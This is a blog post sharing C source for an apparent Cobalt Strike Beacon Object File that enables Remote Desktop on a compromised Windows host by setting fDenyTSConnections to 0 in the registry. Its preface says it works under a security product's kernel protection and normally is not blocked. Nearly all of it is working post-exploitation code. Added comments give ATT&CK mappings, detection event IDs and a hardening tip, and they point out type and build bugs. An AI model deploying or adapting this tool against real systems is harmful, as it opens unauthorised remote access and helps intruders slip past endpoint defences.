Bof-RDP

前言:Bof-RDP的代码,核晶情况下使用,正常的话也不会拦截

#include "bofdefs.h"
extern "C" {
#ifdef BOF
// Writes fDenyTSConnections = 0 under
// HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server, the value Windows
// reads to decide whether Remote Desktop connections are accepted. This one
// registry value is the only thing the function changes.
//
// Returns 0 once the value has been written and -1 when the key cannot be
// opened or the value cannot be set; a status line is sent through
// BeaconPrintf in every case.
// NOTE(review): the declared return type is BOOL, so the -1 failure code is
// non-zero (reads as TRUE) and the 0 success code reads as FALSE.
//
// Defender notes: this is a plain registry value-set on a well-known key
// (ATT&CK T1112, in support of T1021.001). It is visible to Sysmon Event ID 13
// and, when registry auditing is configured on the key, to Security Event
// ID 4657. Where Remote Desktop must stay off, enforce it with the Group
// Policy setting "Allow users to connect remotely by using Remote Desktop
// Services" and alert on any change of this value outside change control.
BOOL StartRDP() {
    // DFR_LOCAL comes from bofdefs.h (not shown here); presumably it makes the
    // named ADVAPI32 export callable inside this function -- confirm there.
    // RegOpenKeyA, RegQueryValueExA and RegEnumKeyExA are declared but never
    // called below.
    DFR_LOCAL(ADVAPI32, RegOpenKeyExA);
    DFR_LOCAL(ADVAPI32, RegOpenKeyA);
    DFR_LOCAL(ADVAPI32, RegQueryValueExA);
    DFR_LOCAL(ADVAPI32, RegSetValueExA);
    DFR_LOCAL(ADVAPI32, RegEnumKeyExA);
    DFR_LOCAL(ADVAPI32, RegCloseKey);

    // Ask for write-only access (KEY_SET_VALUE) to the Terminal Server key.
    HKEY tsKey;
    LONG status = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                               TEXT("SYSTEM\\CurrentControlSet\\Control\\Terminal Server"),
                               0, KEY_SET_VALUE, &tsKey);
    if (status != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] Could not open registry key for Terminal Server.\n");
        return -1;
    }

    // 0 in fDenyTSConnections means "do not deny", i.e. RDP is enabled.
    DWORD denyConnections = 0;
    status = RegSetValueEx(tsKey, TEXT("fDenyTSConnections"), 0, REG_DWORD,
                           (const BYTE*)&denyConnections, sizeof(denyConnections));
    if (status == ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] RDP has been enabled in the registry.\n");
        RegCloseKey(tsKey);
        return 0;
    }

    // The write failed: report it, then release the handle before returning.
    BeaconPrintf(CALLBACK_OUTPUT, "[-] Could not set registry value for fDenyTSConnections.\n");
    RegCloseKey(tsKey);
    return -1;
}
#endif
// Exported entry routine (presumably the symbol the BOF loader invokes --
// confirm against the loader in use). It performs a single call to
// StartRDP() and discards the result, so a failure is only visible through
// the BeaconPrintf output StartRDP produces.
//
// buff / len: argument buffer and its length; neither is read here.
//
// NOTE(review): StartRDP() is defined only inside the #ifdef BOF section,
// while this function is compiled unconditionally.
void go(char* buff, int len) {
    (void)buff;
    (void)len;
    (void)StartRDP();
}
}
#ifndef BOF
// Stand-alone harness, built only when BOF is not defined: it calls go()
// with no argument data. The command-line arguments are not used.
// NOTE(review): main is declared void here; standard C and C++ expect int.
void main(int argc, char* argv[]) {
    (void)argc;
    (void)argv;
    go(NULL, 0);
}
#endif

posted @   zpchcbd  阅读(31)  评论(0编辑  收藏  举报